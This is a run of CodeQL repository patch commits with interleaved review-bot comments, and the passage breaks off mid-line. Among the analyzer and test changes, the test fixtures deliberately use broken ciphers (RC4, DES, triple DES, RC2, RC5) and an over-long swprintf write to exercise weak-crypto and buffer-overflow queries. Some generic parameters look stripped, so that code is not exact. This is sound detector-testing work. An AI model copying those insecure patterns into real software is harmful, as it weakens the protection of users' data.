b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependencyManager.cs index cf4c6d73bd6..b8773f0ae4a 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependencyManager.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependencyManager.cs @@ -545,7 +545,7 @@ namespace Semmle.Extraction.CSharp.DependencyFetching public void Dispose() { nugetPackageRestorer?.Dispose(); - dependabotProxy.Dispose(); + dependabotProxy?.Dispose(); if (cleanupTempWorkingDirectory) { tempWorkingDirectory?.Dispose(); From 667abb19d7705cb0dddad253bc08468097e44d6d Mon Sep 17 00:00:00 2001 
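Review bot: The early `return null` added at the top of `GetDependabotProxy` is silent, whereas the later exit in the same method logs "No Dependabot proxy credentials are configured."; on Windows and macOS a run that has the proxy variables set will presumably reach the feeds without the proxy and leave nothing in the log to say so. Logging before the return, e.g. `logger.LogInfo("Dependabot proxy is not supported on this platform; ignoring any proxy configuration.");`, would make that visible when a restore from a private feed fails. The added comment also reads better as "Setting HTTP(S)_PROXY and SSL_CERT_FILE has no effect ...". The method body continues outside the hunk.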
From: Mathias Vorreiter Pedersen Date: Thu, 5 Dec 2024 13:13:44 +0000 Subject: [PATCH 0830/1267] C++: Expose a final alias instead of the abstract class. --- .../code/cpp/ir/implementation/EdgeKind.qll | 16 +++++++++------- 1 file changed, 9 insertions(+), 7 deletions(-) diff --git a/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll b/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll index 81db183fa63..0fd31c9f45e 100644 --- a/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll +++ b/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll @@ -20,16 +20,18 @@ private newtype TEdgeKind = * `Instruction` or `IRBlock` has at most one successor of any single * `EdgeKind`. */ -abstract class EdgeKind extends TEdgeKind { +abstract private class EdgeKindImpl extends TEdgeKind { /** Gets a textual representation of this edge kind. */ abstract string toString(); } +final class EdgeKind = EdgeKindImpl; + /** * A "goto" edge, representing the unconditional successor of an `Instruction` * or `IRBlock`. */ -class GotoEdge extends EdgeKind, TGotoEdge { +class GotoEdge extends EdgeKindImpl, TGotoEdge { final override string toString() { result = "Goto" } } @@ -37,7 +39,7 @@ class GotoEdge extends EdgeKind, TGotoEdge { * A "true" edge, representing the successor of a conditional branch when the * condition is non-zero. */ -class TrueEdge extends EdgeKind, TTrueEdge { +class TrueEdge extends EdgeKindImpl, TTrueEdge { final override string toString() { result = "True" } } @@ -45,7 +47,7 @@ class TrueEdge extends EdgeKind, TTrueEdge { * A "false" edge, representing the successor of a conditional branch when the * condition is zero. */ -class FalseEdge extends EdgeKind, TFalseEdge { +class FalseEdge extends EdgeKindImpl, TFalseEdge { final override string toString() { result = "False" } } 
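Review bot: The new public alias `final class EdgeKind = EdgeKindImpl;` in the `@@ -20,16 +20,18 @@` hunk has no QLDoc of its own; the existing comment now sits on the private `EdgeKindImpl`, so the name that library users actually see is left undocumented. Moving that comment (whose opening lines are outside the hunk) onto the alias, and leaving a one-line `/** The implementation class behind `EdgeKind`. */` style comment on the private class, would keep the public documentation attached to the public name. Since `EdgeKind` can no longer be extended from other files after this change, a change note for downstream users may also be warranted.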
@@ -53,7 +55,7 @@ class FalseEdge extends EdgeKind, TFalseEdge { * An "exception" edge, representing the successor of an instruction when that * instruction's evaluation throws an exception. */ -class ExceptionEdge extends EdgeKind, TExceptionEdge { +class ExceptionEdge extends EdgeKindImpl, TExceptionEdge { final override string toString() { result = "Exception" } } @@ -61,7 +63,7 @@ class ExceptionEdge extends EdgeKind, TExceptionEdge { * A "default" edge, representing the successor of a `Switch` instruction when * none of the case values matches the condition value. */ -class DefaultEdge extends EdgeKind, TDefaultEdge { +class DefaultEdge extends EdgeKindImpl, TDefaultEdge { final override string toString() { result = "Default" } } @@ -69,7 +71,7 @@ class DefaultEdge extends EdgeKind, TDefaultEdge { * A "case" edge, representing the successor of a `Switch` instruction when the * the condition value matches a corresponding `case` label. */ -class CaseEdge extends EdgeKind, TCaseEdge { +class CaseEdge extends EdgeKindImpl, TCaseEdge { string minValue; string maxValue; From fd7469848ea7b9f9b857e3e9ec6cca627bccc6fc Mon Sep 17 00:00:00 2001 From: Calum Grant Date: Thu, 5 Dec 2024 13:16:59 +0000 Subject: [PATCH 0831/1267] C++: Test case for cpp/badly-bounded-write --- .../CWE-120/semmle/tests/BadlyBoundedWrite.expected | 1 + .../Security/CWE/CWE-120/semmle/tests/errors.c | 11 +++++++++++ 2 files changed, 12 insertions(+) create mode 100644 cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/errors.c diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/BadlyBoundedWrite.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/BadlyBoundedWrite.expected index 9abc89c68f1..0f9b0567c22 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/BadlyBoundedWrite.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/BadlyBoundedWrite.expected 
@@ -1,2 +1,3 @@
+| errors.c:10:5:10:12 | call to swprintf | This 'call to swprintf' operation is limited to 12 bytes but the destination is only 3 bytes. |
 | tests.c:43:3:43:10 | call to snprintf | This 'call to snprintf' operation is limited to 111 bytes but the destination is only 110 bytes. |
 | tests.c:46:3:46:10 | call to snprintf | This 'call to snprintf' operation is limited to 111 bytes but the destination is only 110 bytes. |
diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/errors.c b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/errors.c
new file mode 100644
index 00000000000..a8f509af154
--- /dev/null
+++ b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/errors.c
@@ -0,0 +1,11 @@
+// semmle-extractor-options: --expect_errors
+
+typedef unsigned long size_t;
+typedef int wchar_t;
+
+int swprintf(wchar_t *s, size_t n, const wchar_t *format, ...);
+
+void test_extraction_errors() {
+ WCHAR buffer[3];
+ swprintf(buffer, 3, L"abc");
+}
From bdb2f3d091d6ba4cc4305518764009bad27fe4ae Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Tue, 3 Dec 2024 11:13:55 +0000 Subject: [PATCH 0832/1267] Rust: Add placeholder query and tests for 'cipher' module. --- .../security/CWE-327/BrokenCryptoAlgorithm.ql | 17 +++ .../CWE-327/BrokenCryptoAlgorithm.expected | 0 .../CWE-327/BrokenCryptoAlgorithm.qlref | 2 + .../query-tests/security/CWE-327/options.yml | 9 ++ .../security/CWE-327/test_cipher.rs | 117 ++++++++++++++++++ 5 files changed, 145 insertions(+) create mode 100644 rust/ql/src/queries/security/CWE-327/BrokenCryptoAlgorithm.ql create mode 100644 rust/ql/test/query-tests/security/CWE-327/BrokenCryptoAlgorithm.expected create mode 100644 rust/ql/test/query-tests/security/CWE-327/BrokenCryptoAlgorithm.qlref create mode 100644 rust/ql/test/query-tests/security/CWE-327/options.yml create mode 100644 rust/ql/test/query-tests/security/CWE-327/test_cipher.rs
diff --git a/rust/ql/src/queries/security/CWE-327/BrokenCryptoAlgorithm.ql b/rust/ql/src/queries/security/CWE-327/BrokenCryptoAlgorithm.ql
new file mode 100644
index 00000000000..3890d54c03b
--- /dev/null
+++ b/rust/ql/src/queries/security/CWE-327/BrokenCryptoAlgorithm.ql
@@ -0,0 +1,17 @@
+/**
+ * @name Use of a broken or weak cryptographic algorithm
+ * @description Using broken or weak cryptographic algorithms can compromise security.
+ * @kind problem
+ * @problem.severity warning
+ * @security-severity 7.5
+ * @precision high
+ * @id rust/weak-cryptographic-algorithm
+ * @tags security
+ * external/cwe/cwe-327
+ */
+
+import rust
+
+from int i
+where none()
+select i
diff --git a/rust/ql/test/query-tests/security/CWE-327/BrokenCryptoAlgorithm.expected b/rust/ql/test/query-tests/security/CWE-327/BrokenCryptoAlgorithm.expected
new file mode 100644
index 00000000000..e69de29bb2d
diff --git a/rust/ql/test/query-tests/security/CWE-327/BrokenCryptoAlgorithm.qlref b/rust/ql/test/query-tests/security/CWE-327/BrokenCryptoAlgorithm.qlref
new file mode 100644
index 00000000000..6b7ff78b567
--- /dev/null
+++ b/rust/ql/test/query-tests/security/CWE-327/BrokenCryptoAlgorithm.qlref
@@ -0,0 +1,2 @@
+query: queries/security/CWE-327/BrokenCryptoAlgorithm.ql
+postprocess: utils/InlineExpectationsTestQuery.ql
\ No newline at end of file
diff --git a/rust/ql/test/query-tests/security/CWE-327/options.yml b/rust/ql/test/query-tests/security/CWE-327/options.yml
new file mode 100644
index 00000000000..72d848f4ca0
--- /dev/null
+++ b/rust/ql/test/query-tests/security/CWE-327/options.yml
@@ -0,0 +1,9 @@
+qltest_cargo_check: true
+qltest_dependencies:
+ - cipher = { version = "0.4.4" }
+ - rc4 = { version = "0.1.0" }
+ - rabbit = { version = "0.4.1" }
+ - aes = { version = "0.8.4" }
+ - des = { version = "0.8.1" }
+ - rc2 = { version = "0.8.1" }
+ - rc5 = { version = "0.0.1" }
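Review bot: The placeholder body `from int i where none() select i` in BrokenCryptoAlgorithm.ql is published with complete alert metadata (`@kind problem`, `@precision high`, `@security-severity 7.5`, `external/cwe/cwe-327`), so it can be selected by query suites and read as CWE-327 coverage for Rust while it can never report a result. Until the logic lands, say so in the file, for example with a leading comment `// Placeholder: reports nothing yet; test_cipher.rs marks the intended alerts as MISSING.`, or keep the query out of the default suites. The `select i` clause also lacks the element-plus-message shape that `@kind problem` expects, which tooling may flag even though the result set is empty.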
diff --git a/rust/ql/test/query-tests/security/CWE-327/test_cipher.rs b/rust/ql/test/query-tests/security/CWE-327/test_cipher.rs new file mode 100644 index 00000000000..34f47130e3a --- /dev/null +++ b/rust/ql/test/query-tests/security/CWE-327/test_cipher.rs 
@@ -0,0 +1,117 @@ + +use cipher::{consts::*, StreamCipher, KeyInit, KeyIvInit, BlockEncrypt, BlockDecrypt, BlockEncryptMut, BlockDecryptMut}; +use rc4::{Rc4}; +use rabbit::{Rabbit, RabbitKeyOnly}; +use aes::{Aes128, Aes192Enc, Aes256Dec}; +use des::{Des, TdesEde2, TdesEde3, TdesEee2, TdesEee3}; +use rc2::{Rc2}; +use rc5::{RC5_16_16_8, RC5_32_16_16}; + +// --- tests --- + +fn test_stream_cipher( + key128: &[u8;16], iv128: &[u8;16], plaintext: &str +) { + let mut data = plaintext.as_bytes().to_vec(); + + // rc4 (broken) + let rc4_key = rc4::Key::::from_slice(key128); + + let mut rc4_cipher1 = Rc4::<_>::new(rc4_key); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + rc4_cipher1.apply_keystream(&mut data); + + let mut rc4_cipher2 = Rc4::::new_from_slice(key128).unwrap(); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + rc4_cipher2.apply_keystream(&mut data); + + let mut rc4_cipher3 = Rc4::<_>::new(rc4_key); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + let _ = rc4_cipher3.try_apply_keystream(&mut data); + + let mut rc4_cipher4 = Rc4::<_>::new(rc4_key); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + let _ = rc4_cipher4.apply_keystream_b2b(plaintext.as_bytes(), &mut data); + + // rabbit + let rabbit_key = rabbit::Key::from_slice(key128); + let rabbit_iv = rabbit::Iv::from_slice(iv128); + + let mut rabbit_cipher1 = RabbitKeyOnly::new(rabbit_key); + rabbit_cipher1.apply_keystream(&mut data); + + let mut rabbit_cipher2 = Rabbit::new(rabbit_key, rabbit_iv); + rabbit_cipher2.apply_keystream(&mut data); +} + +fn test_block_cipher( + key: &[u8], key128: &[u8;16], key192: &[u8;24], key256: &[u8;32], + data: &mut [u8], input: &[u8], block128: &mut [u8;16] +) { + // aes + let aes_cipher1 = Aes128::new(key128.into()); + aes_cipher1.encrypt_block(block128.into()); + aes_cipher1.decrypt_block(block128.into()); + + let aes_cipher2 = Aes192Enc::new_from_slice(key192).unwrap(); + aes_cipher2.encrypt_block(block128.into()); + + let aes_cipher3 = 
Aes256Dec::new(key256.into()); + aes_cipher3.decrypt_block(block128.into()); + + // des (broken) + let des_cipher1 = Des::new(key.into()); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + des_cipher1.encrypt_block(data.into()); + des_cipher1.decrypt_block(data.into()); + + let des_cipher2 = des::Des::new(key.into()); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + des_cipher2.encrypt_block(data.into()); + des_cipher2.decrypt_block(data.into()); + + let des_cipher3 = Des::new_from_slice(key).expect("fail"); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + des_cipher3.encrypt_block(data.into()); + des_cipher3.decrypt_block(data.into()); + + let des_cipher4 = Des::new(key.into()); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + des_cipher4.encrypt_block_b2b(input.into(), data.into()); + des_cipher4.decrypt_block_b2b(input.into(), data.into()); + + let mut des_cipher5 = Des::new(key.into()); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + des_cipher5.encrypt_block_mut(data.into()); + des_cipher5.decrypt_block_mut(data.into()); + + // triple des (broken) + let tdes_cipher1 = TdesEde2::new(key.into()); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + tdes_cipher1.encrypt_block(data.into()); + tdes_cipher1.decrypt_block(data.into()); + + let tdes_cipher2 = TdesEde3::new(key.into()); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + tdes_cipher2.encrypt_block(data.into()); + tdes_cipher2.decrypt_block(data.into()); + + let tdes_cipher3 = TdesEee2::new(key.into()); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + tdes_cipher3.encrypt_block(data.into()); + tdes_cipher3.decrypt_block(data.into()); + + let tdes_cipher4 = TdesEee3::new_from_slice(key).unwrap(); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + tdes_cipher4.encrypt_block(data.into()); + tdes_cipher4.decrypt_block(data.into()); + + // rc2 (broken) + let rc2_cipher1 = Rc2::new(key.into()); // $ MISSING: 
Alert[rust/weak-cryptographic-algorithm] + rc2_cipher1.encrypt_block(data.into()); + rc2_cipher1.decrypt_block(data.into()); + + let rc2_cipher2 = Rc2::new_from_slice(key).expect("fail"); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + rc2_cipher2.encrypt_block(data.into()); + rc2_cipher2.decrypt_block(data.into()); + + let rc2_cipher3 = Rc2::new_with_eff_key_len(key, 64); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + rc2_cipher3.encrypt_block(data.into()); + rc2_cipher3.decrypt_block(data.into()); + + // rc5 (broken) + let rc5_cipher1 = RC5_16_16_8::new(key.into()); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + rc5_cipher1.encrypt_block(data.into()); + rc5_cipher1.decrypt_block(data.into()); + + let rc5_cipher2 = RC5_32_16_16::new_from_slice(key).unwrap(); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + rc5_cipher2.encrypt_block(data.into()); + rc5_cipher2.decrypt_block(data.into()); +} From 1c56692c027a7433fc98f2d2934b11107ba18072 Mon Sep 17 00:00:00 2001 From: Tom Hvitved Date: Thu, 5 Dec 2024 14:43:39 +0100 Subject: [PATCH 0833/1267] Rust: update inline expectations --- rust/ql/test/library-tests/dataflow/sources/test.rs | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rust/ql/test/library-tests/dataflow/sources/test.rs b/rust/ql/test/library-tests/dataflow/sources/test.rs index e4701865a7e..7b33a00864e 100644 --- a/rust/ql/test/library-tests/dataflow/sources/test.rs +++ b/rust/ql/test/library-tests/dataflow/sources/test.rs @@ -38,11 +38,11 @@ fn test_env_args() { sink(arg3); // $ MISSING: hasTaintFlow for arg in std::env::args() { // $ Alert[rust/summary/taint-sources] - sink(arg); // $ MISSING: hasTaintFlow + sink(arg); // $ hasTaintFlow } for arg in std::env::args_os() { // $ Alert[rust/summary/taint-sources] - sink(arg); // $ MISSING: hasTaintFlow + sink(arg); // $ hasTaintFlow } } From 5bebfdeb2ae3988a34f79159f2803f8ba1717ed0 Mon Sep 17 00:00:00 2001 
From: Mathias Vorreiter Pedersen Date: Thu, 5 Dec 2024 13:59:59 +0000 Subject: [PATCH 0834/1267] C#: Add a MaD model for the 'Microsoft.AspNetCore.Mvc.Controller.View' method. --- .../ql/lib/ext/Microsoft.AspNetCore.Mvc.model.yml | 13 +++++++++++++ 1 file changed, 13 insertions(+) create mode 100644 csharp/ql/lib/ext/Microsoft.AspNetCore.Mvc.model.yml diff --git a/csharp/ql/lib/ext/Microsoft.AspNetCore.Mvc.model.yml b/csharp/ql/lib/ext/Microsoft.AspNetCore.Mvc.model.yml new file mode 100644 index 00000000000..e980e51810b --- /dev/null +++ b/csharp/ql/lib/ext/Microsoft.AspNetCore.Mvc.model.yml 
@@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: codeql/csharp-all + extensible: summaryModel + data: + - ["Microsoft.AspNetCore.Mvc", "Controller", True, "View", "()", "", "Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "value", "manual"] + - ["Microsoft.AspNetCore.Mvc", "Controller", True, "View", "(System.Object)", "", "Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "value", "manual"] + - ["Microsoft.AspNetCore.Mvc", "Controller", True, "View", "(System.String)", "", "Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "value", "manual"] + - ["Microsoft.AspNetCore.Mvc", "Controller", True, "View", "(System.String,System.Object)", "", "Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "taint", "manual"] + - ["Microsoft.AspNetCore.Mvc", "Controller", True, "View", "()", "", "Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewBag]", "ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "value", "manual"] + - ["Microsoft.AspNetCore.Mvc", "Controller", True, "View", "(System.Object)", "", 
"Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewBag]", "ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "value", "manual"] + - ["Microsoft.AspNetCore.Mvc", "Controller", True, "View", "(System.String)", "", "Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewBag]", "ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "value", "manual"] + - ["Microsoft.AspNetCore.Mvc", "Controller", True, "View", "(System.String,System.Object)", "", "Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewBag]", "ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "value", "manual"] From ed4819aeab6ecdf3c5fa924e0e777423e64b6cf7 Mon Sep 17 00:00:00 2001 From: Tom Hvitved Date: Thu, 5 Dec 2024 15:18:25 +0100 Subject: [PATCH 0835/1267] Rust: Cache `defaultAdditionalTaintStep` --- .../rust/dataflow/internal/DataFlowImpl.qll | 4 ++- .../dataflow/internal/TaintTrackingImpl.qll | 3 ++ .../rust/elements/internal/ArrayExprImpl.qll | 2 +- .../lib/codeql/rust/internal/CachedStages.qll | 34 ++++++++++++++++--- 4 files changed, 37 insertions(+), 6 deletions(-) diff --git a/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll b/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll index b22b27c4db6..80fb80e7dc6 100644 --- a/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll +++ b/rust/ql/lib/codeql/rust/dataflow/internal/DataFlowImpl.qll 
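Review bot: Among the `ViewData` rows of Microsoft.AspNetCore.Mvc.model.yml, the `View(System.String,System.Object)` overload is modelled with kind `taint`, while the other three `ViewData` rows and all four `ViewBag` rows use `value` for the same input and output paths. If the difference is not deliberate, that row should end in `"value", "manual"` like its siblings, otherwise flow through this one overload is tracked less precisely than through the rest. If it is deliberate, a `#` comment above the row stating why this overload differs would stop the next editor from "fixing" it.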
@@ -1101,9 +1101,11 @@ import MakeImpl /** A collection of cached types and predicates to be evaluated in the same stage. */ cached private module Cached { + private import codeql.rust.internal.CachedStages + cached newtype TNode = - TExprNode(ExprCfgNode n) or + TExprNode(ExprCfgNode n) { Stages::DataFlowStage::ref() } or TSourceParameterNode(ParamBaseCfgNode p) or TPatNode(PatCfgNode p) or TExprPostUpdateNode(ExprCfgNode e) { diff --git a/rust/ql/lib/codeql/rust/dataflow/internal/TaintTrackingImpl.qll b/rust/ql/lib/codeql/rust/dataflow/internal/TaintTrackingImpl.qll index 13f0052a5ba..25cc7e22faf 100644 --- a/rust/ql/lib/codeql/rust/dataflow/internal/TaintTrackingImpl.qll +++ b/rust/ql/lib/codeql/rust/dataflow/internal/TaintTrackingImpl.qll @@ -4,6 +4,7 @@ private import codeql.rust.controlflow.CfgNodes private import codeql.rust.dataflow.FlowSummary private import DataFlowImpl private import FlowSummaryImpl as FlowSummaryImpl +private import codeql.rust.internal.CachedStages module RustTaintTracking implements InputSig { predicate defaultTaintSanitizer(Node::Node node) { none() } @@ -12,7 +13,9 @@ module RustTaintTracking implements InputSig { * Holds if the additional step from `pred` to `succ` should be included in all * global taint flow configurations. */ + cached predicate defaultAdditionalTaintStep(Node::Node pred, Node::Node succ, string model) { + Stages::DataFlowStage::ref() and model = "" and ( exists(BinaryExprCfgNode binary | diff --git a/rust/ql/lib/codeql/rust/elements/internal/ArrayExprImpl.qll b/rust/ql/lib/codeql/rust/elements/internal/ArrayExprImpl.qll index 13abb32bcce..97f237e4772 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/ArrayExprImpl.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/ArrayExprImpl.qll 
@@ -22,7 +22,7 @@ module Impl { * ``` */ class ArrayExpr extends Generated::ArrayExpr { - cached + pragma[nomagic] private Raw::ArrayExprInternal getUnderlyingEntity() { this = Synth::TArrayListExpr(result) or this = Synth::TArrayRepeatExpr(result) } diff --git a/rust/ql/lib/codeql/rust/internal/CachedStages.qll b/rust/ql/lib/codeql/rust/internal/CachedStages.qll index 1fdd3c2a9b8..0cf3c32921e 100644 --- a/rust/ql/lib/codeql/rust/internal/CachedStages.qll +++ b/rust/ql/lib/codeql/rust/internal/CachedStages.qll @@ -35,10 +35,6 @@ module Stages { */ cached module AstStage { - private import codeql.rust.controlflow.internal.Splitting - private import codeql.rust.controlflow.internal.SuccessorType - private import codeql.rust.controlflow.internal.ControlFlowGraphImpl - /** * Always holds. * Ensures that a predicate is evaluated as part of the AST stage. @@ -98,4 +94,34 @@ module Stages { exists(CallExprCfgNode n | exists(n.getFunction())) } } + + /** + * The data flow stage. + */ + cached + module DataFlowStage { + private import codeql.rust.dataflow.internal.DataFlowImpl + private import codeql.rust.dataflow.internal.TaintTrackingImpl + + /** + * Always holds. + * Ensures that a predicate is evaluated as part of the data flow stage. + */ + cached + predicate ref() { 1 = 1 } + + /** + * DO NOT USE! + * + * Contains references to each predicate that use the above `ref` predicate. + */ + cached + predicate backref() { + 1 = 1 + or + exists(Node n) + or + RustTaintTracking::defaultAdditionalTaintStep(_, _, _) + } + } } From b7f47f752b0d80608fd803cce6a91afa3f662719 Mon Sep 17 00:00:00 2001 From: Calum Grant Date: Thu, 5 Dec 2024 14:37:19 +0000 Subject: [PATCH 0836/1267] C++: Remove FPs from cpp/badly-bounded-write --- cpp/ql/src/Security/CWE/CWE-120/BadlyBoundedWrite.ql | 3 ++- .../CWE/CWE-120/semmle/tests/BadlyBoundedWrite.expected | 1 - 2 files changed, 2 insertions(+), 2 deletions(-) 
diff --git a/cpp/ql/src/Security/CWE/CWE-120/BadlyBoundedWrite.ql b/cpp/ql/src/Security/CWE/CWE-120/BadlyBoundedWrite.ql index e7dd6a5d8e3..e89ffac906e 100644 --- a/cpp/ql/src/Security/CWE/CWE-120/BadlyBoundedWrite.ql +++ b/cpp/ql/src/Security/CWE/CWE-120/BadlyBoundedWrite.ql @@ -25,7 +25,8 @@ from BufferWrite bw, int destSize where bw.hasExplicitLimit() and // has an explicit size limit destSize = max(getBufferSize(bw.getDest(), _)) and - bw.getExplicitLimit() > destSize // but it's larger than the destination + bw.getExplicitLimit() > destSize and // but it's larger than the destination + not bw.getDest().getUnderlyingType().stripType() instanceof ErroneousType // destSize may be incorrect select bw, "This '" + bw.getBWDesc() + "' operation is limited to " + bw.getExplicitLimit() + " bytes but the destination is only " + destSize + " bytes." diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/BadlyBoundedWrite.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/BadlyBoundedWrite.expected index 0f9b0567c22..9abc89c68f1 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/BadlyBoundedWrite.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/BadlyBoundedWrite.expected @@ -1,3 +1,2 @@ -| errors.c:10:5:10:12 | call to swprintf | This 'call to swprintf' operation is limited to 12 bytes but the destination is only 3 bytes. | | tests.c:43:3:43:10 | call to snprintf | This 'call to snprintf' operation is limited to 111 bytes but the destination is only 110 bytes. | | tests.c:46:3:46:10 | call to snprintf | This 'call to snprintf' operation is limited to 111 bytes but the destination is only 110 bytes. | From 4af18be70b8ef10519a22f604fcd1cd0cd027cfa Mon Sep 17 00:00:00 2001 
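Review bot: The added conjunct `not bw.getDest().getUnderlyingType().stripType() instanceof ErroneousType` suppresses a buffer-overflow alert, and its trailing comment `// destSize may be incorrect` does not say why the size is unreliable or what is being given up. For a suppression in a security query the reason is worth spelling out, e.g. `// the destination's type failed to extract, so the computed buffer size cannot be trusted; skip rather than report a false positive`. The `from`/`where` clause this belongs to starts above the hunk.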
From: Mathias Vorreiter Pedersen Date: Thu, 5 Dec 2024 14:42:59 +0000 Subject: [PATCH 0837/1267] C#: Add change note. --- csharp/ql/lib/change-notes/2024-12-05-aspnetcore-mvc-model.md | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 csharp/ql/lib/change-notes/2024-12-05-aspnetcore-mvc-model.md diff --git a/csharp/ql/lib/change-notes/2024-12-05-aspnetcore-mvc-model.md b/csharp/ql/lib/change-notes/2024-12-05-aspnetcore-mvc-model.md new file mode 100644 index 00000000000..04afe96522b --- /dev/null +++ b/csharp/ql/lib/change-notes/2024-12-05-aspnetcore-mvc-model.md @@ -0,0 +1,4 @@ +--- +category: minorAnalysis +--- +* Added flow summaries for the `Microsoft.AspNetCore.Mvc.Controller::View` method. \ No newline at end of file From 41f08d9b84c74b5719ef37d7775581bcbf6b2a09 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Thu, 5 Dec 2024 14:59:37 +0000 Subject: [PATCH 0838/1267] C#: Accept test changes. --- .../library-tests/dataflow/library/FlowSummaries.expected | 8 ++++++++ .../dataflow/library/FlowSummariesFiltered.expected | 8 ++++++++ 2 files changed, 16 insertions(+) diff --git a/csharp/ql/test/library-tests/dataflow/library/FlowSummaries.expected b/csharp/ql/test/library-tests/dataflow/library/FlowSummaries.expected index 033c83df3bd..25e4a9317eb 100644 --- a/csharp/ql/test/library-tests/dataflow/library/FlowSummaries.expected +++ b/csharp/ql/test/library-tests/dataflow/library/FlowSummaries.expected 
@@ -1506,6 +1506,14 @@ summary | Microsoft.AspNetCore.Mvc;ApiBehaviorOptions;GetEnumerator;();Argument[this].Element;ReturnValue.Property[System.Collections.IEnumerator.Current];value;manual | | Microsoft.AspNetCore.Mvc;ApiBehaviorOptions;set_InvalidModelStateResponseFactory;(System.Func);Argument[0];Argument[0].Parameter[delegate-self];value;hq-generated | | Microsoft.AspNetCore.Mvc;Controller;OnActionExecutionAsync;(Microsoft.AspNetCore.Mvc.Filters.ActionExecutingContext,Microsoft.AspNetCore.Mvc.Filters.ActionExecutionDelegate);Argument[1];Argument[1].Parameter[delegate-self];value;hq-generated | +| Microsoft.AspNetCore.Mvc;Controller;View;();Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewBag];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];value;manual | +| Microsoft.AspNetCore.Mvc;Controller;View;();Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];value;manual | +| 